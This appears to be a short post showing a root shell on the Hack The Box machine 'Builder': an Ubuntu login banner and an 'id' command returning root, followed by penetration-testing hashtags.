  IPv6 address for eth0:    dead:beef::250:56ff:feb9:35cc

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See <https://ubuntu.com/esm> or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Feb 12 13:15:44 2024 from 10.10.14.40
root@builder:~# id
uid=0(root) gid=0(root) groups=0(root)

#hackthebox #htb #pentest #pentester #pentesting #cybersecurity #cybersec #offensivesecurity #offsec #redteam #redteamer #redteaming #hack #hacker #hacking #ethicalhacking #ethicalhacker #informationsecurity #infosec